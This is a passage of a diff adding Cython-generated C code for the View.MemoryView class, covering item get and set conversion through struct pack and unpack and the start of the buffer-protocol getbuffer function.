__Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (PY_MAJOR_VERSION >= 3) __Pyx_ExceptionSwap(&__pyx_t_10, &__pyx_t_11, &__pyx_t_12); + if ((PY_MAJOR_VERSION < 3) || unlikely(__Pyx_GetException(&__pyx_t_7, &__pyx_t_8, &__pyx_t_9) < 0)) __Pyx_ErrFetch(&__pyx_t_7, &__pyx_t_8, &__pyx_t_9); + __Pyx_XGOTREF(__pyx_t_7); + __Pyx_XGOTREF(__pyx_t_8); + __Pyx_XGOTREF(__pyx_t_9); + __Pyx_XGOTREF(__pyx_t_10); + __Pyx_XGOTREF(__pyx_t_11); + __Pyx_XGOTREF(__pyx_t_12); + __pyx_t_4 = __pyx_lineno; __pyx_t_5 = __pyx_clineno; __pyx_t_6 = __pyx_filename; + { + PyMem_Free(__pyx_v_tmp); + } + if (PY_MAJOR_VERSION >= 3) { + __Pyx_XGIVEREF(__pyx_t_10); + __Pyx_XGIVEREF(__pyx_t_11); + __Pyx_XGIVEREF(__pyx_t_12); + __Pyx_ExceptionReset(__pyx_t_10, __pyx_t_11, __pyx_t_12); + } + __Pyx_XGIVEREF(__pyx_t_7); + __Pyx_XGIVEREF(__pyx_t_8); + __Pyx_XGIVEREF(__pyx_t_9); + __Pyx_ErrRestore(__pyx_t_7, __pyx_t_8, __pyx_t_9); + __pyx_t_7 = 0; __pyx_t_8 = 0; __pyx_t_9 = 0; __pyx_t_10 = 0; __pyx_t_11 = 0; __pyx_t_12 = 0; + __pyx_lineno = __pyx_t_4; __pyx_clineno = __pyx_t_5; __pyx_filename = __pyx_t_6; + goto __pyx_L1_error; + } + __pyx_L7:; + } + + /* "View.MemoryView":453 + * memoryview_copy_contents(msrc, mdst, src.ndim, dst.ndim, self.dtype_is_object) + * + * cdef setitem_slice_assign_scalar(self, memoryview dst, value): # <<<<<<<<<<<<<< + * cdef int array[128] + * cdef void *tmp = NULL + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.memoryview.setitem_slice_assign_scalar", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":485 + * PyMem_Free(tmp) + * + * cdef setitem_indexed(self, index, value): # <<<<<<<<<<<<<< + * cdef char *itemp = self.get_item_pointer(index) + * self.assign_item_from_object(itemp, value) + */ + +static PyObject *__pyx_memoryview_setitem_indexed(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_value) { + char *__pyx_v_itemp; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + char *__pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("setitem_indexed", 0); + + /* "View.MemoryView":486 + * + * cdef setitem_indexed(self, index, value): + * cdef char *itemp = self.get_item_pointer(index) # <<<<<<<<<<<<<< + * self.assign_item_from_object(itemp, value) + * + */ + __pyx_t_1 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->get_item_pointer(__pyx_v_self, __pyx_v_index); if (unlikely(__pyx_t_1 == ((char *)NULL))) __PYX_ERR(1, 486, __pyx_L1_error) + __pyx_v_itemp = __pyx_t_1; + + /* "View.MemoryView":487 + * cdef setitem_indexed(self, index, value): + * cdef char *itemp = self.get_item_pointer(index) + * self.assign_item_from_object(itemp, value) # <<<<<<<<<<<<<< + * + * cdef convert_item_to_object(self, char *itemp): + */ + __pyx_t_2 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->assign_item_from_object(__pyx_v_self, __pyx_v_itemp, __pyx_v_value); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 487, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "View.MemoryView":485 + * PyMem_Free(tmp) + * + * cdef setitem_indexed(self, index, value): # <<<<<<<<<<<<<< + * cdef char *itemp = self.get_item_pointer(index) + * self.assign_item_from_object(itemp, value) + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.setitem_indexed", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":489 + * self.assign_item_from_object(itemp, value) + * + * cdef convert_item_to_object(self, char *itemp): # <<<<<<<<<<<<<< + * """Only used if instantiated manually by the user, or if Cython doesn't + * know how to convert the type""" + */ + +static PyObject *__pyx_memoryview_convert_item_to_object(struct __pyx_memoryview_obj *__pyx_v_self, char *__pyx_v_itemp) { + PyObject *__pyx_v_struct = NULL; + PyObject *__pyx_v_bytesitem = 0; + PyObject *__pyx_v_result = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + int __pyx_t_8; + Py_ssize_t __pyx_t_9; + int __pyx_t_10; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("convert_item_to_object", 0); + + /* "View.MemoryView":492 + * """Only used if instantiated manually by the user, or if Cython doesn't + * know how to convert the type""" + * import struct # <<<<<<<<<<<<<< + * cdef bytes bytesitem + * + */ + __pyx_t_1 = __Pyx_ImportDottedModule(__pyx_n_s_struct, NULL); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 492, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_struct = __pyx_t_1; + __pyx_t_1 = 0; + + /* "View.MemoryView":495 + * cdef bytes bytesitem + * + * bytesitem = itemp[:self.view.itemsize] # <<<<<<<<<<<<<< + * try: + * result = struct.unpack(self.view.format, bytesitem) + */ + __pyx_t_1 = __Pyx_PyBytes_FromStringAndSize(__pyx_v_itemp + 0, __pyx_v_self->view.itemsize - 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 495, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_bytesitem = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "View.MemoryView":496 + * + * bytesitem = itemp[:self.view.itemsize] + * try: # <<<<<<<<<<<<<< + * result = struct.unpack(self.view.format, bytesitem) + * except struct.error: + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_2, &__pyx_t_3, &__pyx_t_4); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_4); + /*try:*/ { + + /* "View.MemoryView":497 + * bytesitem = itemp[:self.view.itemsize] + * try: + * result = struct.unpack(self.view.format, bytesitem) # <<<<<<<<<<<<<< + * except struct.error: + * raise ValueError, "Unable to convert item to object" + */ + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_v_struct, __pyx_n_s_unpack); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 497, __pyx_L3_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = __Pyx_PyBytes_FromString(__pyx_v_self->view.format); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 497, __pyx_L3_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_7 = NULL; + __pyx_t_8 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_5))) { + __pyx_t_7 = PyMethod_GET_SELF(__pyx_t_5); + if (likely(__pyx_t_7)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); + __Pyx_INCREF(__pyx_t_7); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_5, function); + __pyx_t_8 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_7, __pyx_t_6, __pyx_v_bytesitem}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_8, 2+__pyx_t_8); + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 497, __pyx_L3_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + __pyx_v_result = __pyx_t_1; + __pyx_t_1 = 0; + + /* "View.MemoryView":496 + * + * bytesitem = itemp[:self.view.itemsize] + * try: # <<<<<<<<<<<<<< + * result = struct.unpack(self.view.format, bytesitem) + * except struct.error: + */ + } + + /* "View.MemoryView":501 + * raise ValueError, "Unable to convert item to object" + * else: + * if len(self.view.format) == 1: # <<<<<<<<<<<<<< + * return result[0] + * return result + */ + /*else:*/ { + __pyx_t_9 = __Pyx_ssize_strlen(__pyx_v_self->view.format); if (unlikely(__pyx_t_9 == ((Py_ssize_t)-1))) __PYX_ERR(1, 501, __pyx_L5_except_error) + __pyx_t_10 = (__pyx_t_9 == 1); + if (__pyx_t_10) { + + /* "View.MemoryView":502 + * else: + * if len(self.view.format) == 1: + * return result[0] # <<<<<<<<<<<<<< + * return result + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_result, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 502, __pyx_L5_except_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L6_except_return; + + /* "View.MemoryView":501 + * raise ValueError, "Unable to convert item to object" + * else: + * if len(self.view.format) == 1: # <<<<<<<<<<<<<< + * return result[0] + * return result + */ + } + + /* "View.MemoryView":503 + * if len(self.view.format) == 1: + * return result[0] + * return result # <<<<<<<<<<<<<< + * + * cdef assign_item_from_object(self, char *itemp, object value): + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_result); + __pyx_r = __pyx_v_result; + goto __pyx_L6_except_return; + } + __pyx_L3_error:; + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "View.MemoryView":498 + * try: + * result = struct.unpack(self.view.format, bytesitem) + * except struct.error: # <<<<<<<<<<<<<< + * raise ValueError, "Unable to convert item to object" + * else: + */ + __Pyx_ErrFetch(&__pyx_t_1, &__pyx_t_5, &__pyx_t_6); + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_v_struct, __pyx_n_s_error); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 498, __pyx_L5_except_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_8 = __Pyx_PyErr_GivenExceptionMatches(__pyx_t_1, __pyx_t_7); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_ErrRestore(__pyx_t_1, __pyx_t_5, __pyx_t_6); + __pyx_t_1 = 0; __pyx_t_5 = 0; __pyx_t_6 = 0; + if (__pyx_t_8) { + __Pyx_AddTraceback("View.MemoryView.memoryview.convert_item_to_object", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_6, &__pyx_t_5, &__pyx_t_1) < 0) __PYX_ERR(1, 498, __pyx_L5_except_error) + __Pyx_XGOTREF(__pyx_t_6); + __Pyx_XGOTREF(__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_1); + + /* "View.MemoryView":499 + * result = struct.unpack(self.view.format, bytesitem) + * except struct.error: + * raise ValueError, "Unable to convert item to object" # <<<<<<<<<<<<<< + * else: + * if len(self.view.format) == 1: + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_Unable_to_convert_item_to_object, 0, 0); + __PYX_ERR(1, 499, __pyx_L5_except_error) + } + goto __pyx_L5_except_error; + + /* "View.MemoryView":496 + * + * bytesitem = itemp[:self.view.itemsize] + * try: # <<<<<<<<<<<<<< + * result = struct.unpack(self.view.format, bytesitem) + * except struct.error: + */ + __pyx_L5_except_error:; + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_XGIVEREF(__pyx_t_4); + __Pyx_ExceptionReset(__pyx_t_2, __pyx_t_3, __pyx_t_4); + goto __pyx_L1_error; + __pyx_L6_except_return:; + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_XGIVEREF(__pyx_t_4); + __Pyx_ExceptionReset(__pyx_t_2, __pyx_t_3, __pyx_t_4); + goto __pyx_L0; + } + + /* "View.MemoryView":489 + * self.assign_item_from_object(itemp, value) + * + * cdef convert_item_to_object(self, char *itemp): # <<<<<<<<<<<<<< + * """Only used if instantiated manually by the user, or if Cython doesn't + * know how to convert the type""" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_AddTraceback("View.MemoryView.memoryview.convert_item_to_object", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_struct); + __Pyx_XDECREF(__pyx_v_bytesitem); + __Pyx_XDECREF(__pyx_v_result); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":505 + * return result + * + * cdef assign_item_from_object(self, char *itemp, object value): # <<<<<<<<<<<<<< + * """Only used if instantiated manually by the user, or if Cython doesn't + * know how to convert the type""" + */ + +static PyObject *__pyx_memoryview_assign_item_from_object(struct __pyx_memoryview_obj *__pyx_v_self, char *__pyx_v_itemp, PyObject *__pyx_v_value) { + PyObject *__pyx_v_struct = NULL; + char __pyx_v_c; + PyObject *__pyx_v_bytesvalue = 0; + Py_ssize_t __pyx_v_i; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + int __pyx_t_6; + Py_ssize_t __pyx_t_7; + PyObject *__pyx_t_8 = NULL; + char *__pyx_t_9; + char *__pyx_t_10; + char *__pyx_t_11; + char *__pyx_t_12; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("assign_item_from_object", 0); + + /* "View.MemoryView":508 + * """Only used if instantiated manually by the user, or if Cython doesn't + * know how to convert the type""" + * import struct # <<<<<<<<<<<<<< + * cdef char c + * cdef bytes bytesvalue + */ + __pyx_t_1 = __Pyx_ImportDottedModule(__pyx_n_s_struct, NULL); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 508, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_struct = __pyx_t_1; + __pyx_t_1 = 0; + + /* "View.MemoryView":513 + * cdef Py_ssize_t i + * + * if isinstance(value, tuple): # <<<<<<<<<<<<<< + * bytesvalue = struct.pack(self.view.format, *value) + * else: + */ + __pyx_t_2 = PyTuple_Check(__pyx_v_value); + if (__pyx_t_2) { + + /* "View.MemoryView":514 + * + * if isinstance(value, tuple): + * bytesvalue = struct.pack(self.view.format, *value) # <<<<<<<<<<<<<< + * else: + * bytesvalue = struct.pack(self.view.format, value) + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_struct, __pyx_n_s_pack); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 514, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __Pyx_PyBytes_FromString(__pyx_v_self->view.format); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 514, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = PyTuple_New(1); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 514, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_t_3); + __pyx_t_3 = 0; + __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_value); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 514, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_5 = PyNumber_Add(__pyx_t_4, __pyx_t_3); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 514, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = __Pyx_PyObject_Call(__pyx_t_1, __pyx_t_5, NULL); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 514, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (!(likely(PyBytes_CheckExact(__pyx_t_3))||((__pyx_t_3) == Py_None) || __Pyx_RaiseUnexpectedTypeError("bytes", __pyx_t_3))) __PYX_ERR(1, 514, __pyx_L1_error) + __pyx_v_bytesvalue = ((PyObject*)__pyx_t_3); + __pyx_t_3 = 0; + + /* "View.MemoryView":513 + * cdef Py_ssize_t i + * + * if isinstance(value, tuple): # <<<<<<<<<<<<<< + * bytesvalue = struct.pack(self.view.format, *value) + * else: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":516 + * bytesvalue = struct.pack(self.view.format, *value) + * else: + * bytesvalue = struct.pack(self.view.format, value) # <<<<<<<<<<<<<< + * + * for i, c in enumerate(bytesvalue): + */ + /*else*/ { + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_v_struct, __pyx_n_s_pack); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 516, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = __Pyx_PyBytes_FromString(__pyx_v_self->view.format); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 516, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_4 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_5))) { + __pyx_t_4 = PyMethod_GET_SELF(__pyx_t_5); + if (likely(__pyx_t_4)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); + __Pyx_INCREF(__pyx_t_4); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_5, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_4, __pyx_t_1, __pyx_v_value}; + __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 516, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + if (!(likely(PyBytes_CheckExact(__pyx_t_3))||((__pyx_t_3) == Py_None) || __Pyx_RaiseUnexpectedTypeError("bytes", __pyx_t_3))) __PYX_ERR(1, 516, __pyx_L1_error) + __pyx_v_bytesvalue = ((PyObject*)__pyx_t_3); + __pyx_t_3 = 0; + } + __pyx_L3:; + + /* "View.MemoryView":518 + * bytesvalue = struct.pack(self.view.format, value) + * + * for i, c in enumerate(bytesvalue): # <<<<<<<<<<<<<< + * itemp[i] = c + * + */ + __pyx_t_7 = 0; + if (unlikely(__pyx_v_bytesvalue == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' is not iterable"); + __PYX_ERR(1, 518, __pyx_L1_error) + } + __Pyx_INCREF(__pyx_v_bytesvalue); + __pyx_t_8 = __pyx_v_bytesvalue; + __pyx_t_10 = PyBytes_AS_STRING(__pyx_t_8); + __pyx_t_11 = (__pyx_t_10 + PyBytes_GET_SIZE(__pyx_t_8)); + for (__pyx_t_12 = __pyx_t_10; __pyx_t_12 < __pyx_t_11; __pyx_t_12++) { + __pyx_t_9 = __pyx_t_12; + __pyx_v_c = (__pyx_t_9[0]); + + /* "View.MemoryView":519 + * + * for i, c in enumerate(bytesvalue): + * itemp[i] = c # <<<<<<<<<<<<<< + * + * @cname('getbuffer') + */ + __pyx_v_i = __pyx_t_7; + + /* "View.MemoryView":518 + * bytesvalue = struct.pack(self.view.format, value) + * + * for i, c in enumerate(bytesvalue): # <<<<<<<<<<<<<< + * itemp[i] = c + * + */ + __pyx_t_7 = (__pyx_t_7 + 1); + + /* "View.MemoryView":519 + * + * for i, c in enumerate(bytesvalue): + * itemp[i] = c # <<<<<<<<<<<<<< + * + * @cname('getbuffer') + */ + (__pyx_v_itemp[__pyx_v_i]) = __pyx_v_c; + } + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + + /* "View.MemoryView":505 + * return result + * + * cdef assign_item_from_object(self, char *itemp, object value): # <<<<<<<<<<<<<< + * """Only used if instantiated manually by the user, or if Cython doesn't + * know how to convert the type""" + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("View.MemoryView.memoryview.assign_item_from_object", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_struct); + __Pyx_XDECREF(__pyx_v_bytesvalue); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":521 + * itemp[i] = c + * + * @cname('getbuffer') # <<<<<<<<<<<<<< + * def __getbuffer__(self, Py_buffer *info, int flags): + * if flags & PyBUF_WRITABLE and self.view.readonly: + */ + +/* Python wrapper */ +CYTHON_UNUSED static int __pyx_memoryview_getbuffer(PyObject *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags); /*proto*/ +CYTHON_UNUSED static int __pyx_memoryview_getbuffer(PyObject *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__getbuffer__ (wrapper)", 0); + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_8__getbuffer__(((struct __pyx_memoryview_obj *)__pyx_v_self), ((Py_buffer *)__pyx_v_info), ((int)__pyx_v_flags)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_8__getbuffer__(struct __pyx_memoryview_obj *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags) { + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_t_2; + Py_ssize_t *__pyx_t_3; + char *__pyx_t_4; + void *__pyx_t_5; + int __pyx_t_6; + Py_ssize_t __pyx_t_7; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + if (unlikely(__pyx_v_info == NULL)) { + PyErr_SetString(PyExc_BufferError, "PyObject_GetBuffer: view==NULL argument is obsolete"); + return -1; + } + __Pyx_RefNannySetupContext("__getbuffer__", 0); + __pyx_v_info->obj = Py_None; __Pyx_INCREF(Py_None); + __Pyx_GIVEREF(__pyx_v_info->obj); + + /* "View.MemoryView":523 + * @cname('getbuffer') + * def __getbuffer__(self, Py_buffer *info, int flags): + * if flags & PyBUF_WRITABLE and self.view.readonly: # <<<<<<<<<<<<<< + * raise ValueError, "Cannot create writable memory view from read-only memoryview" + * + */ + __pyx_t_2 = ((__pyx_v_flags & PyBUF_WRITABLE) != 0); + if (__pyx_t_2) { + } else { + __pyx_t_1 = __pyx_t_2; + goto __pyx_L4_bool_binop_done; + } + __pyx_t_1 = __pyx_v_self->view.readonly; + __pyx_L4_bool_binop_done:; + if (unlikely(__pyx_t_1)) { + + /* "View.MemoryView":524 + * def __getbuffer__(self, Py_buffer *info, int flags): + * if flags & PyBUF_WRITABLE and self.view.readonly: + * raise ValueError, "Cannot create writable memory view from read-only memoryview" # <<<<<<<<<<<<<< + * + * if flags & PyBUF_ND: + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_Cannot_create_writable_memory_vi, 0, 0); + __PYX_ERR(1, 524, __pyx_L1_error) + + /* "View.MemoryView":523 + * @cname('getbuffer') + * def __getbuffer__(self, Py_buffer *info, int flags): + * if flags & PyBUF_WRITABLE and self.view.readonly: # <<<<<<<<<<<<<< + * raise ValueError, "Cannot create writable memory view from read-only memoryview" + * + */ + } + + /* "View.MemoryView":526 + * raise ValueError, "Cannot create writable memory view from read-only memoryview" + * + * if flags & PyBUF_ND: # <<<<<<<<<<<<<< + * info.shape = self.view.shape + * else: + */ + __pyx_t_1 = ((__pyx_v_flags & PyBUF_ND) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":527 + * + * if flags & PyBUF_ND: + * info.shape = self.view.shape # <<<<<<<<<<<<<< + * else: + * info.shape = NULL + */ + __pyx_t_3 = __pyx_v_self->view.shape; + __pyx_v_info->shape = __pyx_t_3; + + /* "View.MemoryView":526 + * raise ValueError, "Cannot create writable memory view from read-only memoryview" + * + * if flags & PyBUF_ND: # <<<<<<<<<<<<<< + * info.shape = self.view.shape + * else: + */ + goto __pyx_L6; + } + + /* "View.MemoryView":529 + * info.shape = self.view.shape + * else: + * info.shape = NULL # <<<<<<<<<<<<<< + * + * if flags & PyBUF_STRIDES: + */ + /*else*/ { + __pyx_v_info->shape = NULL; + } + __pyx_L6:; + + /* "View.MemoryView":531 + * info.shape = NULL + * + * if flags & PyBUF_STRIDES: # <<<<<<<<<<<<<< + * info.strides = self.view.strides + * else: + */ + __pyx_t_1 = ((__pyx_v_flags & PyBUF_STRIDES) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":532 + * + * if flags & PyBUF_STRIDES: + * info.strides = self.view.strides # <<<<<<<<<<<<<< + * else: + * info.strides = NULL + */ + __pyx_t_3 = __pyx_v_self->view.strides; + __pyx_v_info->strides = __pyx_t_3; + + /* "View.MemoryView":531 + * info.shape = NULL + * + * if flags & PyBUF_STRIDES: # <<<<<<<<<<<<<< + * info.strides = self.view.strides + * else: + */ + goto __pyx_L7; + } + + /* "View.MemoryView":534 + * info.strides = self.view.strides + * else: + * info.strides = NULL # <<<<<<<<<<<<<< + * + * if flags & PyBUF_INDIRECT: + */ + /*else*/ { + __pyx_v_info->strides = NULL; + } + __pyx_L7:; + + /* "View.MemoryView":536 + * info.strides = NULL + * + * if flags & PyBUF_INDIRECT: # <<<<<<<<<<<<<< + * info.suboffsets = self.view.suboffsets + * else: + */ + __pyx_t_1 = ((__pyx_v_flags & PyBUF_INDIRECT) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":537 + * + * if flags & PyBUF_INDIRECT: + * info.suboffsets = self.view.suboffsets # <<<<<<<<<<<<<< + * else: + * info.suboffsets = NULL + */ + __pyx_t_3 = __pyx_v_self->view.suboffsets; + __pyx_v_info->suboffsets = __pyx_t_3; + + /* "View.MemoryView":536 + * info.strides = NULL + * + * if flags & PyBUF_INDIRECT: # <<<<<<<<<<<<<< + * info.suboffsets = self.view.suboffsets + * else: + */ + goto __pyx_L8; + } + + /* "View.MemoryView":539 + * info.suboffsets = self.view.suboffsets + * else: + * info.suboffsets = NULL # <<<<<<<<<<<<<< + * + * if flags & PyBUF_FORMAT: + */ + /*else*/ { + __pyx_v_info->suboffsets = NULL; + } + __pyx_L8:; + + /* "View.MemoryView":541 + * info.suboffsets = NULL + * + * if flags & PyBUF_FORMAT: # <<<<<<<<<<<<<< + * info.format = self.view.format + * else: + */ + __pyx_t_1 = ((__pyx_v_flags & PyBUF_FORMAT) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":542 + * + * if flags & PyBUF_FORMAT: + * info.format = self.view.format # <<<<<<<<<<<<<< + * else: + * info.format = NULL + */ + __pyx_t_4 = __pyx_v_self->view.format; + __pyx_v_info->format = __pyx_t_4; + + /* "View.MemoryView":541 + * info.suboffsets = NULL + * + * if flags & PyBUF_FORMAT: # <<<<<<<<<<<<<< + * info.format = self.view.format + * else: + */ + goto __pyx_L9; 